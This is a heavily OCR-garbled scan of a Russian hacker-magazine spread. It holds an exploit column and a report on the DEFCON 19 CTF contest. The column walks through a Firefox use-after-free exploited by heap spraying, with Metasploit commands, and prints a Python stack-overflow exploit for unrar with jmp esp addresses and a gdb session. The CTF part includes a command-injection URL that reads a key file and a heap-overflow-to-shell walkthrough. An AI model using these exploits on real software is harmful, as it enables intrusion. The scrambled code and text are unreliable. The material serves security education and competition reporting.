Арртч#*А Ріу « Іігі ■г^птітуіі, лші+ігк %.іцті Іігі Ьу 
пи-»іР|[ ршлГп)- 



да*і5 


ГРИМАМИ. 


пмйн 


МАИШАІ РІРР 


0АІСКМ1ЮН 


МТ 


ЧССПОТССТ 


ЧНШМіТТ- 


иьмлупон 


ітмііоіп - 


гомгвдиксЕ 




ГСЧТНУНІЕ* 




РІТСН 


рятрики 


-рівдмиі і ші ів*мгі 
*Ц ИѵьМчі Ьа шгі 


1 

і 

1 

* 

і 

1 



С* ****** ІВД Я 4 таг 4М ЙМиГ^вНу КЕТ, 

м« м^геіл, «1 ЧКИ,УТМ?»І ЛГИ лсрр™і 
□тал -рчі атом зн.ишчі-Ьер'ичѵ і^ч^че і*і *чі 



1 : И/ Е $рс 

6^30550^9 Секі ІѲрІ і*47297> : 


рор 


еЬч 


(дсіЬ> 

0*080550^ Іп 77 П 

і: >:/ і $рс 

0хВ055Ос1а Се^ІіѲрІ 1 + : 


рор 


05 I 


С дсРЬ > 

Ѳн08055ѲгіЬ іп ?? П 
1 ! К/ 1 $рс 

Ѳк80550гіЬ <еніі:ер11+ 47299> : 


рор 


есіі 


С дсІЬ > 

еп ?? о 

1 : к/ Е $рс 

0к80550сіс <ечі 10рІІН7Э00> : 


рор 


еЬр 


СагтрЦ всс0і^ понижу йі 


дн4Ы\417? 


(дбЬ) 

0К0В070 197 іп ?? П 
1 ; к/ I $рс 

Ѳн8Ѳ70і97: ,]тр о^р 

ЕдОЬ) 0 







В Мануэле поязыкуРЛ_309страниц— этотебе не ѴѴЕРломать! 



Прыгаем на полезную нагрузку 



• ошибки и другие исключительные обстоятельства; 

• путаница в вопросе о том, какая часть программы отвечает за осво- 
бождение данных. 

В этом случае память, о которой идетречь, спокойно выделяет- 
ся другомууказателю в какой-то моментпослетого, какона была 
освобождена. Первоначальный указатель на освобожденную память 
используется снова и указывает на некий адрес в новой выделенной 
области памяти. Изменение данных при ведет к искажению действи- 
тельно используемой памяти, что может привести к непредсказуемому 
поведению процесса. 

Допустим, что получитсятак, что вновь выделяемые данные будут 
удерживать класс, например в С++, при этом различные указатели 
функций могутбытьразбросаны поданным кучи. Если один изэтих 
указателей функций перезапишется адресом шеллкода,то может 
быть достигнуто выполнение произвольного кода. 

Выдержка из соп1епі/Ьа5е/5гс/п50Ьіес1І_оасІіпдСоп1еп1.срр: 

п50Ь]'ес1;ІоасІіп§Соп1;еп1;::0пСІіаппе1КесІіпес1;( 
пБІСИап пе! * а01сІСІіаппе1, 
пзІСбап пеІ * а№ыСІіаппе1, 

ЙКШп-Ш аРІа§5) 

{ 

// ГР ме'не аіпеасіѵ Ьизѵ игЕН а пеы ІоасІ. сапсеі Ііііе несіінесі: 

і-р ( аОІсІСІіаппеІ != тСІіаппе1)Д 

пеііипп N 5 ВІМРІІМСі АВОКТЕР; 



(тСІаББІбеп) { 

тС1а55Ібеп->0пКесІіпес1:(а01сІСІіаппе1^аМеыСІіаппе1); 

} 



тСІіаппеІ = аМеыСІіаппеІ; 
пеііипп М50К; 

ь_ 

Существует возможность вызова метода 0пСНаппеІПесІігес1,уста- 
на вливающего практически произвольный объект в качестве канала 
для использования, когда элемент ОВЗ ЕСТ (реализация интерфейса 
ПБІСИаппеІЕѵепіЗіпк] не имеет назначенного тСНаппеІ. Проблема в 
том, что тСНаппеІ является слабой ссылкой (как определено в сопіепі/ 



Ьазе/Бгс/пБОЬіесНоабіпдСопІепІ.Ы и в результате после цикла сборки 
мусора превращается в висящий указатель. 

Висящая ссылка можетбыть использована путем установки 
атрибута сіаіа нашему элементу ОВЗ ЕСТ. Это приведет к вызову метода 
І_оасІ0Ь]ес1 и загрузке ОВ^СТ'а. 

пБ0Ьіес1±оас1іп%Соп1іеп1і::ІоасІ0Ьіес1і(п5ІЦКІ* аІШ, 

РКВооІ аІМоІііТу, 

сопбіі пбС5~Еніп%& аТуреНіпІі. 

РКВооІ аРопсеІ-оасО 

{ 



ІТ (т СЬаппеЛ { 



тСІіаппе1->Сапсе1(М5_ВІМРІІ\ІС_АВ0КТЕР); 

} 



ь_ 

В модуле теіазріоіі, реализующем данную уязвимость, применя- 
ется техника Ріеарзргауіпд, которую мы сейчас вкратце опишем для 
дальнейшего понимания дел а. Технику Ріеар зргауіпд можно приме- 
нить, когда программа, содержащаяуязвимость, обращается по не- 
существующемуучастку памяти, находящемуся вадресном простран- 
стве кучи. При этом адрес не должен быть выше 0х7Ш1Ш, поскольку 
далее следует адресное пространство ядра, к которому приложение из 
гіпдЗ не имеет доступа. 

Ключевым моментом для использования Ріеар зргауіпд является 
возможность управления кучей, иначе говоря, возможн ость добав- 
лять данные в кучу, выделяя под них память, до тех пор пока неисполь- 
зуемый до этого момента адрес в памяти процесса не начнет существо- 
вать. Добавлять данные в кучу мы будем блоками, причем каждый из 
блоков будет иметь следующий вид: пор-цепочка + зРіеІІсосІе. Данные 
телодвижения совершаются потому, что операционная система сама 
распределяет адресное пространство для выделения динамической 
памяти, соответственно, даже имея на рукахточный адрес, по кото- 
рому будет передаваться у правление в результате исполнения уяз- 
вимого кода, мы не сможем точно утверждать, на какую инструкцию 
в памяти оно попадет. Потому-то и пор-цепочка нужна. Техника Неар 
зргауіпд в основном используется при эксплуатировании уязвимостей 
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Дизассемблерныйлистингуязвимогоместадляипгаг<=3.93 



в браузерах, ибо при помощи Э5-скриптов, выполняющихся на стороне 
клиента, мы получаем возможностьуправления кучей, о которой было 
упомянуто выше. 

Практическая демонстрация уязвимости при помощи модуля МБР 
очень проста: поднимаем сервер при помощи теіазріоіі'а, идем на 
клиент, вбиваем в Рігеіох адрес сплоита и видим результат работы экс- 
плоита — запустившийся калькулятор: 

Ш5-Р# ехр1оіѣ(то2І11а тсііаппеі) > бѳі: РАУЮАР міпсІоіл/5/ехес 
РАУЮАО => міпсІомБ/ехес 

тБ-Р # е хр 1о гЬ(то2І11а т с И апп е і ) > зеі: СМР саі с. ехе 
СМР => саіс.ехе 

гпб-Р# ехр 1 оі 1 :(то 2 І 11 а_тсІіаппе 1 ) > ехріоіі: 

[*] Ехріоіі: пиппіп§ аз Ьаск§гоипсІ ]'оЬ. 



[*] іібіп^ ЦКБ: Н1:1:р://Ѳ.Ѳ.Ѳ.Ѳ:8Ѳ8Ѳ/сп6п1ІЬгІ\І0УЕ 
[*] Боса! ІР: Мі1:р://192 .168.0. 23:8Ѳ8Ѳ/сп6п1ІЬг№УЕ 
[*] Бегѵег 5І:аг1:есІ. 



ТАК6ЕТ5 



МогіІІа РігеРох 3.6.1 6 



боклкм 



Существуют обновлен ия, устраняющие да иную уязвим ость. 



4 



ІІпгаг 3.9.3 ЬосаІ 51аск 
Оѵегііоѵѵ Ехріоіі 
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( АѴ:Б/АС: Б/Аи: М/С:С/І:С/А:С) 

ші=и 

Дата релиза: 5 августа 2011 года, автор: 2асІУгее, СѴЕ: Ы/А. 

СІпгаг — распространенная в среде *піх- пользователей утилита, 
предназначенная для извлечения, тестирования и просмотра содер- 
жимого архивов, которые были созданы при помощи архиватора РАР. 
Уязвимость, которую обнаружил 2асІУгее, кроется в неправильной 
обработкеаргументов, поступающих на входутилите. 



ЕХРЮІТ 



Я позволил себе немного подредактировать авторский вариант экс- 
плоита и получил следующее: 

ітрогі: 5у5 

■Рпот Бігисі ітрогі: * 



Ьи-Р = + '31 гу 5'*817 + ’ААА' + р аскГГ ,0x80 70197) 

БІіеІІсосІе = "\хсс\хсс\хсс\хсс\хаа\хаа\хаа\хаа\хЬЬ\хЬЬ\хЬЬ\хЬЬ\ 
хсс\хсс\хсс\хсс\хсісі\хсісі\хсісі\хсісі" 
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Электронные книги 

Ѵ/ЕХІЕЯ 



В ДАЛЬНЕЙШЕМ МЫ СМОЖЕМ 
ПОНАБЛЮДАТЬ ВООЧИЮ, КАК 
ИСПОЛНЯЕТСЯ КОД ПОЛЕЗНОЙ 
НАГРУЗКИ НА СТЕКЕ 



-Р = ореп('ехр!_ор1:іоп'. 'ыЬ') 

■р.ыггЕеСЬи -Р + зМеІІсосІе + ' \Ѳ12 ' ) 

"Р . СІ05Ѳ ( ) 

В дальнейшем мы с тобой сможем понаблюдать воочию, как ис- 
полняется код полезной нагрузки на стеке, ну а пока что необходимо 
разобраться с тем, откуда взялся адрес 0x8070197 в коде эксплоита. 

Перед нами классическое переполнение буфера на стеке с вы- 
текающей отсюда перезаписьюадреса возврата. Так какуказатель на 
полезную на грузку л ежит в регистре езр,то нам необходимо прыг- 
нуть на командуітр езр (или другую последовательность команд, 
имеющую схожее действие], соответственно, для этого мы должны 
переписать адрес возврата адресом команды ітр езр. Так найдем же 
подобные адреса в исполняемом модуле и пгаг'а. 

( л - л< ) оЬісІитр -Р /и5г/Ьіп/ипгаг | ^гер "-Р-Р е4" | ^гер ітр 



«уьтеот: 

8070197: 


тт е4 
-Р-Р е4 


З т Р 

З'тр 


-Ѵоезр 

*%езр 


8070317: 


-Р-Р е4 


Дтр 


*%езр 


807038-Р: 


-Р-Р е4 


З’тр 


*%езр 


8070527: 


-Р-Р е4 


З т Р 


*%езр 



В результате уязвимости управление получаеткод, располагаю- 
щийся на стеке: 

( л - л ) %сІЬ -- аг§5 ипгаг ’саі: ехрі оріі іоп 1 
(по сІеЬи§§іп§ зутЬоІз -РоипсІ) 

(§сІЬ) г 

51:ап1:іп^ рпо^пат: /изп/Ып/иппап -31гѵ531гѵ531гѵ5...531гѵ5АА... 



ЕККОК: Упкпоып ор1:іоп: ЗіпѵбЗіпѵбЗіпѵб. . .ЗІпѵзАА. . . 



Рпо§пат песеіѵесі 5І§па1 5ІСТКАР, Тпасе/Ьпеакроіпі: 1:пар. 
0хЬТаЬ6405 іп ?? () 

1: х/і $рс 



0хЬ-РаЬ6405: 


Іп1:3 








(дсІЬ) х/20х $еір-1 








0хЬ-РаЬ6404: 


0ХСССССССС 


Ѳхаааааааа 


ѲхЬЬЬЬЬЬЬЬ 


0ХСССССССС 


0хЬ-РаЬ6414: 


0ХСІСІСІСІСІСІСІСІ 


0хЬ-РаЬ6400 


0Х08067-Р22 


0х0806ес60 


0хЬ-РаЬ6424: 


ѲхЬ-РаЬ-РсІ-Ра 


0х08048Ь97 


0хЬ7483а8с 


0X00000000 


0хЬ-РаЬ6434: 


0X00000000 


0хЬ-РаЬба98 


0х080680е7 


ѲхЬ~РаЬ7~Р98 


0хЬ-РаЬ6444: 
ХяйШ 


ѲхЬ-РаЬ-РсІ-Ра 


0х08048с77 


0хЬ7483а8с 


0x08048460 



Что и требовалось доказать. Ну а содержимое полезной нагрузки 
остается полностью натвоей совести. 



ТАК0ЕТ5ХХХ 



ипгаг<=3.93 



зоиліоы 



К сожалению, патчей, устраняющих да иную уязвимость, яненашел.Но 
всегда можно самостоятельно создать новый сегмент в исполняемом 
модуле и пгаг'а, добавить туда код по проверке на вшивость входных ар- 
гументов и проставитьсоответствующие прыжки в нужные места. ИНИ 




ШЕХІЕД.ВООХ Е5Ш1 

-Н Еі *0 ІЛУЧШСЧСЯ'О И ІЩЕ роти*. ІІСЛЛАТнО 

■ #гой тт книс і шмі* 



КОМФОРТНОЕ ЧТЕНИЕ 

СТИЛЬНЫЙ ГАДЖЕТ 




шсхигг 

♦ 



ЦЖШ.ШВДІЙГ.ГУ 
ТЕЛШніШ# ЛИНИі-.-В (600| гм К 6* 
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Роман «гух2145» Василенко, (сЖазрегзку І_аЬ 
Марат« 1 ои 2 оки» Вышегородцев, (аИнформзащита 




ОЕЕСОЫ СТР 

ОТЧЕТ С ХАКЕРСКОГО КОНТЕСТА ИЗ ЛАС-ВЕГАСА 



В Лас-Вегасе завершились две 
крупные хакерские конферен- 
ции: ВІаскНаІ 2011 и ОЕРСОЫ 19. 
Последняя интересна нетолько 
сногсшибательными докладами, 
но и знаменитыми соревнова- 
ниями по компьютерной безопас- 
ности «Саріиге ТНе РІад» (СТР), в 
которых впервые принялауча- 
стие команда из России. Какэто 
было и что вообще представляют 
собой такие хак-квесты, расска- 
жут непосредственные участни- 
ки событий. 



Сайты команд: 

• Наскегсіот: 

ѵѵѵѵѵѵ.ііаскегсіот.ги: 

• І_ееІМоге: 

Іееітоге.сН.аи: 

• ЗіВеагБ: 

5ІЬеаг5.ги: 

• БтокесіСЬіскеп: 

втокегісИіскеп.огд . 



0X01. ЧТО ТАКОЕ СТР? 

СарШгеШе РІад — это игра, в которой команды получаютв распоряжение 
набор уязвимых приложений-сервисов. Основная идея заключается в 
том, чтобы ломатьсервисы быстреедругихкоманд, писатьэксплоиты, 
успевать патчиться, поддерживать все в рабочем состоянии и — на неко- 
торых играх — еще и описыватьуязвимости в бюллетенях безопасности 
за дополнительные очки. Эдакая кибервойна в миниатюре. Соревнова- 
ния проводятся, как правило, от нескольких часов до нескольких суток, 
часто без перерывов на сон. Существует два основных типа СТР: «Своя 
игра» и классический вариант. Первый чаще используется на отбороч- 
ныхсоревнованиях, второй на финальных, поскольку для классического 
СТРтребуетсяболеесложная инфраструктура. 

В миресуществуетнесколькоподобныхсоревнований, включая ІІС5В 
ІСТР, І\ІиіШиНаск, рІаібСТР, ПиСТРЕ и др. ОЕРСОМ СТР проводится с 1996 г. 
и является старейшим и, наверное, самым престижным из них. Впервые 
российская команда прошла в финал и заняла там почетное 4-е место. Мы 
опередилитакихбизонов, каккомандуУниверситета Калифорнии Санта- 
Барбары (устроителей ІСТР], командуУниверситета Карнеги-Меллона, 
корейцев из РОБТЕСН-РоНапд, специалистов из одной правительствен- 
ной военной компании США, а также японских, испанских и американ- 
ских профессионалов в И Б. Но обо всем по порядку. 
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ОЕРСОІЧ СТР 



0X02. ОЕРСОЫ СТР РРЕ01ІАІ_5 

Отборочные игры Оекоп СТР проходят в формате ^орагбу — англ, 
название телепередачи «Своя игра». Участникам предоставляются 
25-30 заданий разной сложности и стоимости в таких областях И Б, 
как геѵегзе епдіпеегіпд, {огепзісз, Ыпагу ехріоііаііоп, раске* апаіузіз 
и т. д. При данном формате игры командам не нужно защищать свои 
серверы и применять патчи — необходимо просто решать задачи, 
вытаскивать изнихфлагии отправлять их в форму ответа. Обычно, 
решая за дачу первой, команда получает бонусные очки за «первую 
кровь». 

Та кой формат игры менеединамичен, но позволяет од повремен- 
но играть неограниченному числу ко манд. В этом году в отборочных 
играх за регистр провал ось бол ее 700 ко манд, и с ненулевым счетом 
закончило более 280. Интересно, что от России в этом году вы ступа- 
ла сборная ко манда Теат IV, возникшая в результате слияния четы- 
рех сильнейших команд по результатам прошлых соревнований: 

• Наскегсіот — Уральский федеральный университет; 

• І_ееІ Моге — Санкт-Петербургский государственный универси- 
тет информационныхтехнологий, механики и оптики; 

• БіВеагз — Томский государственный университет; 

• БтокесІСбіскеп — Южно-Уральский государственный университет. 

Объединив ус ил и я, мы планировали стать первой российской 
командойвфиналеОЕРСОМСТРс претензией на победу. По иронии 
судьбы, команда заняла 4-е место на отборочном этапе и таким 
образом попала в список тех 12 команд, которые по регламенту про- 
ходят в финал. Для примера приведем несколько заданий. 

6КАВ100 

Веб-сервер наБРОУ 

На порту 5932 запущен некоторый сервис. После продолжи- 
тельных манипуляций выясняется, что это арасбе, работающий по 
протоколу 5Р0У (улучшенная реализация НТТР от боодіе]. Нахо- 
дим бажный скрипт в /с§і-Ьіп/ и пробуем вытащить ключ после 
изучения директорий Ы:1:р://рып583.сІсІ1:ек.Ы2:5932/с§і-Ып/ 
рІтР?ра1іаз=%0Аса1:%20/Ііоте/Тк-Рб2К2сІ/кеу. Не срабатывает (филь- 
труется слово кеу). Меняем запрос: 61:1:р://рмп583.сІсІ1:ек.ЬІ2:5932/ 
с§і-Ьіп/рЬ-р?ра1іа5=%0Аса1:%20/Иоте/Тк-Рб2К2сІ/к*. Получаем флаг: 
■ЫіаІУз -Раз* епои^б пом §о Іаке а гезі:. 

Р0ВЕМ5ІС5 200 

Образ ЫТРБснеобычным файловым атрибутом 

Вы данный файл размером ровно 50 Мб представляет собой образ 
диска с МТРЗ'ным разделом. Раскопки загрузчика вМВРниче- 
го не дали, хоть он и выглядел не совсем стандартным. Засунув 
образ в Х-ѴѴауз Рогепзісз, мы увидели, что в корне раздела лежат 
100 каталогов вида біг**, в каждом из которых примерно по 220 
файлов.Всего21 978файлов, каждыйсуникальным содержимым, 
попадающим под регулярное выражение ([0-9а--Р]\0{24}){40}. 
Натравив утилиту пНзѵѵаІк, обнаружили подозрительный файл \ 
(Игб0\кеу 50883. Подозрителен он был тем, что его файловая запись 
в $МРТ содержала нестандартный ИТРЗ-атрибут с номером 1 1 0 Ь, 
тогда как в «стандарте» ИТРБ описаны лишь атрибуты с номерами 
менее 1006. 

Мы заглянули в этот 1106-й атрибуте помощью все того же 
Х-ѴѴауз Рогепзісз, расковыряли его (структурно он был похож на 
атрибуты известных типов), вычислили, в каких кластерах хранятся 
его данные, и вытащили их. Вообще, есть довольно распростра- 
ненная практика прятать секретные данные в «альтернативных 
потоках данных ЫТР5» — атрибутах с номером 806, отличающимся 
именем потока. Для поиска и просмотра альтернативных потоков 
данных есть масса готовых утилит, видимо, поэтому организато- 
ры поступили хитрее и спрятали данные в самодельном КІТР5- 
атрибуте. Извлеченные байтики имели точно такой же вид, как и 
обычное содержимое всех остальных файлов (маскировались под 
них). Выкинув нулевые байты, получили ответ: 47а96-Рас9есІЬ95е641 
е835е21се800934сІ4с8-Р7е. 




■ив |йй іііі ин нов 



ЯК ?№ ЯК ЯН ЯН 



Ш раз яя\ *■! НР 



иш -ійй іГіі +Гч! іуи 



УШ ЧЛй ЫИИ ШГ «О 



Формат передачи «Своя игра»: разные области ИБ и разная сложностьзаданий 
РМТЕЫТ РѴѴМАВБЕБ 500 

Бинарникс переполнением кучи и утечкой памяти 

Реверсбинарника показывает, что при посылке команды ир1оасІ_ 
пем_гесогсІ создается один экземпляр класса сІаззѲІ или с1а5502 в 
случайном порядке. Метод с1а55_02::сору_Ьи-р-Рег уязвим кперепол- 
нен ию буфера, которое дает 24 байта перезаписи в куче. 

ѵоіеі сіазз Ѳ2::сорѵ Ьи-Р-РеКсІазз 02 * Іібіз. сбаг * Ьи-Р-Рег) 

{ 

ип5І§ пес! іпі: і; 

-Рог (і = 0;і<= 248; + + і ) 1:6І5- >Ьи-р-Реп[і] = Ьи-р~Реп[ і] ; 

Ь_ 

Используя этуже уязвимость, мы можем подправитьеще и перемен- 
ные Ьи-р-Реп_1еп и с1азз_соип1:, а затем вызвать команду сІипір_оЬ], 
которая скопирует столько данных, сколько установлен о в значение 
Ьи-Р-Реп_1еп. Затем мы создаем несколько экземпляров класса, удаля- 
ем один, так что он образует дыру в куче, куда затем помещаются ма- 
ленькие объекты вроде базб_з1:г или гЬ_1:пее_і1:ет. Далее вызываем 
ѵіем песопсі, чтобы посмотреть, где в куче находится пЬ_1:пее_і1:ет. 
Используя гЬ_1:пее_і1:ет, узнаем адрес нашего экземпляра класса и 
буфера с нашим шелл кодом. Переписываем ѵ-Р1:аЫе, так чтобы она 
указывала на наш шелл код, и вызываем любую функцию, чтобы он 
сработал. Получаем шелл. 

ВШАКѴІ.ЗЗТМЕ55 500 
Исполняемый РЕ-файл сантиотладкой 

При первом просмотре файл оказывается неупакованным, но содер- 
житвеего лишьтри импорта: 

• СІозеНапсІІе; 

• НеарАПос; 

• тегпзеі:. 

Это означает, что все остальные функции он получает динамически 
и, какие сложно обнаружить, делает это через РЕВ сразу после О ЕР. 
Послеэтого программа создаетнесколько потоков сантиотладкой. 
Некоторые используемые приемы антиотладки: 

• МфиегуІп^огтаІііопРгосезз міЬб (ризб Іеб ; РгосеззОеЬидОЬдесіНапсЯё); 

• Ксііізс сбеск; 
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СРЕ0ІТ5 



Хотелосьбы поблагодаритыехребятизкоманды ІѴ(читается какрим- 
ская «четыре», хотя иностранцы завистливо называют нас «ай ви»), 
которые участвовал и в отборочных, но по разным причинам не смогли 
попастьна финал: кому-то недали визу, кто-то не нашел спонсоров 
оплатить поездку, кто-то ушел в горы. Команда благодарит компании 
НИП «Информзащита» за посильный вклад в оплату поездки своих 
сотрудников, СКВ «Контур»за спонсорство екатеринбургской части 
команды, университеты зазнания и помощь. 



0X03. ФИНАЛ. КЛАССИЧЕСКИЙ СТР 

Финальные игры проводятся в классическом формате, приближенном к 
реальномухакингу. Каждая команда имеетнаборсервисов, работающих 
либо на отдельном сервере, л ибо на виртуальной машине, либо, как в этот 
раз, внутри іаіі. Основная задача — защищать свои сервисы и атаковать 
чужие. Результатуспешной атаки — похищенный флаг противника. За 
перезапись флага противника начисляются дополнительн ые очки. Свои 
же флаги нужно хранить в неприкосновенности, но в доступности для 
проверяющего скрипта жюри. Финал соревнований проходит в очной 
форме, все команды собираются водном большом зале. Благо, в отеле 
Ріо, в котором проходила конференция, таких помещений хватает: не зря 
Лас-Вегас славится самыми большими отелями в мире. По регламенту 
йЕРСОМ СТР, за одни метол ом должно си деть не бол ее восьми человек 
плюс одна овца. Овца? Да, организаторы соревнований не стесняются 
своей страстной любви к зИеер^искіпд, но какое это имеет отношение к 
информационной безопасности, никто не знает. Кстати, за фотографию 
совокупления с надувной резиновой овцой организаторы раздавали 
эксклюзивные футболки — стоит л и говорить, что футболки разошлись 
в первые десять минут и в нашей команде таких футболок две? Вне стола 




• №:5е1:Іп-Рогта1:іопТІігеасІ ш±И (ризН ИИ ; ТЪгеасІНісІеРгоігіОеЬиддег) . 

Обойти их непросто, но найти более подробную информацию о том, как 
это сделать, несоставиттрудадля искушенногочитателя. Затем процесс 
выделяетпамятьи копируеттуда код, содержащий основной полезный 
функционал, дальнейшее исполнение происходит в выделенной памяти. 

Однако если просто исполнить программу до конца и снять дамп, то 
в нем мы найдем только набор известных философских цитат. Вся соль 
спрятана в алгоритме их расшифровки. При расшифровке используется 
ключ, который кладется на стек и удаляется изадресного пространства 
процесса. Именно поэтому, если снять дамп, вместо ключа мы получим 
воттакой набор байт: 080052000800520008005200080052000800520008005 
2000800520008005200. Если же проанализироватьалгоритм расшифров- 
ки под отладчиком — о чудо, вот и наш ключ: 2РЕ3903ОР19Е4В01АС590РВА67 
ЮС8752ВО68339Е49147Р29Р5502АО6310ВВ71. 
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ОЕРСОІЧ СТР 



ПРИМЕРЫ 

ЗАДАНИЙ С ФИНАЛА 

Всего в каждой системе организаторы разместили 14 уязвимых 
сервисов. Кодовое название 0ЕРС01М СТР уже третий год подряд — 
«Віпііізи» (от Ыпагу + джиу-джитсу], и неспроста. Абсолютно все 
сервисы представляли собой бинарны еисполняемыеЕБР файлы. 
Никаких баз данных, веб-приложений, интерпретируемых или 
эзотерических языков — только чистый реверс. В основном при- 
сутствовал о два типа уязвимостей: переполнение стека и уязвимая 
форматная строка. Перед эксплуатацией каждой уязвимости нужно 
было решить некую логическую задачку, как-то подобрать нужный 
псевдослучайный порт или же сбрутить нужный хеш. Было и полно- 
стью логическое задание на понимание принципа работы фильтра 
Блум а, и перезапись адреса в связном списке. 






Сервис: СазИе 


Порт: 7629 


Функциональность: При соединении читает данные из сокета до 
появления «ЕОР\п». Считанные данные сохраняются во временном 
файле вида «/Стр/сазСІеХХХХХХХХ», где ХХХХХХХХ — случайные 
значения. После этого сазіііе перенаправляет бСсііп, бСсіоііі: и зіісіегг 
в сокет и запускает другой исполняемый файл /ивп/ІосаІ/Ып/вапсІу с 
параметрами «-о <ІРѵ6> -сі -5 /Сшр/сазСІеХХХХХХХХ», где ІРѵб — 
адрес, с которого произошло соединение. 


Уязвимость: Непосредственно уязвимость находилась в запсіу. 


Ход решения: См. запсіу. 








Сервис: Виппу 


Порт: 15323 


Функциональность: При установке соединения сервис с помощью 
згапсІ(1:іте(0) ) генерирует псевдослучайное число (тах_зІ 2 е) от 5 
до 34. После этого закрывает предыдущее соединение и генерирует 
еще одно псевдослучайное число (гапсІ_рог1:), но уже в диапазоне 
от 1 024 до 65 534, и использует его как порт для ожидания нового 
соединения (ЬіпсІ+ІізСеп). Если происходит соединение на данный 
порт, то считывает 1 байт и сохраняет в массиве длиною в 12 байт. 
Повторяет операции тах_зІ 2 е раз. 


Уязвимость: Как можно заметить, тах_зіге может быть до 34 байт, 
при этом массив Ііаузііаск всего 12 байт — явное переполнение 
буфера. Однако есть два подводных камня. Во-первых, для того 
чтобы писать в буфер, нужно знать номер случайного порта, 
а он от 1 024 до 65 534. На помощь приходит то, что зеесі при 
инициализации генератора псевдорандомных чисел равен 
1ііте(0), а системное время у всех команд одинаковое. Во-вторых, 
переполнение очень маленькое, такое маленькое, что подходящих 
эксплоитов такого размера нет. Хитрость в том, что так как 
тах_5Іге лежит на стеке, между геі-адресом и переполняемым 
массивом Ііаузііаск, нужно переписать его, а так как он является 
счетчиком итераций, то после этого можно использовать столько 
памяти для эксплоита, сколько потребуется. 


Ход решения: «Хорошая мысля приходит опосля» — в данном случае 
это именно наш кейс. Переполнение нашли, свой сервис запатчили, 
но эксплоит почему-то сразу не получилось написать, и появился он у 
нас лишь под конец игры. Что ж, в следующий раз будем проворнее. 








Сервис: Ніѵег 


Порт: 44366 


Функциональность: При соединении читает данные из сокета: 
первые 4 байта — длина пакета, далее сам пакет. Создает фильтр 
Блума, в котором определено 10 разных хеш-функций. После этого 
считывает флаг из файла кеу и использует его в качестве битового 
массива. Считанные из Сети данные использует для проверки того, 
принадлежат ли они к битовому множеству или нет. На выходе при 
каждом запуске получается набор из 10 значащих бит. Позиция 
каждого бита соответствует номеру хеш-функции в фильтре Блума, 
значение соответствует значению бита из флага, чья позиция 
вычисляется на основе хеша. 


Уязвимость: Сгенерировать такой набор входных параметров, чтобы 
программа отдала все значения битов из флага, после чего собрать из 
них флаг. 


Ход решения: В час ночи, после первого дня соревнований, усталые 
и расстроенные тем фактом, что на табло напротив нашей команды 
до сих пор 0 очков, мы решили исправить ситуацию. Через пару часов 
эксплоит был готов и, довольные, мы завалились спать. 
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КАКИЕ ЕЩЕ ЕСТЬ СТР? 



ТІіеиСЗВіСТР 

ісН.СБ.исзЬ.есІи 

Международные студенческие соревнования, 
которые п роводитун и верситет Калифорнии Санта- 
Барбары в начале декабря. Известны, прежде 
всего, тем, что с 2008 г. каждый год сносят крышу, 
придумывая совершенно новые правила игры, 
которые больше нигде не встречаются. 

ССЮЕ6АТЕСТР 

ѵѵѵѵѵѵ.сосіедаіе.огд 

Корейцы известны своей любовью ккиберспорту. 
Ежегодно в Корее проводитсяЗ-4СТР, связанные 
обычное конференцией по И Б. С0БЕ6АТЕСТР, 
который проводится в начале мая, является одним 
из лучших {азк-ЬазесІ-соревнован ий. 




тишей ел 







РІІСТРЕ 

ѵѵѵѵѵѵ.гисН.огд 

Команда Наскегсіот изУрГУ — первая российская 
команда, которая начала играть в СТР и продви- 
гать СТР в России. С 2007 г. исправно организуют 
студенческие всероссийские соревнования РиСТР. 
С 2009 г. в декабре проводят международные со- 
ревнования, которые отличаются стабильностью, 
масштабностью и интересными сервисами. 




РСТРТ 



рІаісІСТР 

ѵѵѵѵѵѵ.рІаісІсН.сот 

Команда РРРиз Карнеги -Мел л он, появившаяся в 
2009 г., сразу начала показывать высокие результа- 
ты почти на всех соревнованиях. После того каким 
надоело всехобыгрывать, они решили провести 
свои соревнования. Парни оправдали ожидания 
и устроили в апреле соревнования с интерес- 
нейшими заданиями и необычным геймбордом 
(датеЬоагсІ] в виде плана здания. 



РНОСТР 

рНбауз.ги/сН депегаі.азр 

РозШѵеНаскОаузСТР — международные сорев- 
нования позащитеинформации, которыевпервые 
проводились в мае 2011 г. Запомнились прежде всего 
отличнойорганизацией, масштабностью, интерес- 
ными сервисами и разнообразными заданиями. 



ИДЕЯ ЗАКЛЮЧАЕТСЯ В ТОМ, 
ЧТОБЫ ЛОМАТЬ СЕРВИСЫ 
БЫСТРЕЕ ДРУГИХ КОМАНД, 
ПИСАТЬ ЭКСПЛОИТЫ, УСПЕВАТЬ 
ПАТЧИТЬСЯ И ПОДДЕРЖИВАТЬ 
ВСЕ В РАБОЧЕМ СОСТОЯНИИ 



количество людей не регламентируется, поэтомунекоторыечитеры (не 
будем показыватьпальцем на командуизЯпонии) сидели и реверсили 
на полу рядом со столом в среднем количестве 20 человек. Нам в этом 
смысл е не повезло, т. к. большей части команды не дал и американские 
визы после упоминания словосочетания «компьютерная безопасность» 
на собеседовании в консульстве. Удаленно поучаствовал о очень мал о 
игроков, в основном из-за разницы во времени. 

СТР начался стого, что мы обнаружили только флешку с ключами 
доступа к своему серверу, два БАМ -кабеля (до сервера и до игровой 
сети], одну электрическую розетку у своего стола. Пришлосьбратьтакси 
и лететьв магазин электроники неподалеку, чтобы потратить$300 на 
блекджек и распутна свичи и провода, т. к. никто из организаторов не 
предупреждал об ихотсутствии. Сзадержкой втри часа игра началась, и 
в кабелях появился л инк. Что делать дальше, нужно был о узнать самим. 
Запускаем снифер на кабеле к серверу, видим ІСМРѵб-трафик. Вспоми- 
наем, ка к поднимать ІРѵб-интерфейсы, заодно узнаем, что все члены ко- 
манды прогуляли ѴѴогІсІ ІРѵб Бау. Сюрпризом игры былото, чтоабсолютно 
все сервисы были написаны под ІРѵб. Пришлось экстрен но переписывать 
все домашние заготовки под шестые сокеты. 

Сервер представлял собой РгееВ308.2, разделенный ЗаіІ. Напомним, 
чтоЗаіІ — это механизм виртуализации уровня ОС в РгееВЗО, позволя 10 - 
щи й создать несколько независимых мини-ОС со своим набором прило- 
жений и настройками. Таким образом, каждая команда работала в своем 
ЗаіІ'е, а организаторы постоянно имели контроль над всеми системами. 
Именно через ЗаіІ организаторы обновляли и проверяли файлы с флага- 
ми. Данный механизм отличается от привычного нам, когда флаги про- 
веряются и обновляются непосредственно через работающие на системе 
сервисы, видимо, разработчики простополенилисьписатьсистемукак 
следует. Мы не преминули воспользоваться этим недостатком: поскольку 
сервисы были фактически не связаны с флагами, мызатуннелировали 
весьтрафики перенесли все приложения на отдельную виртуальную 
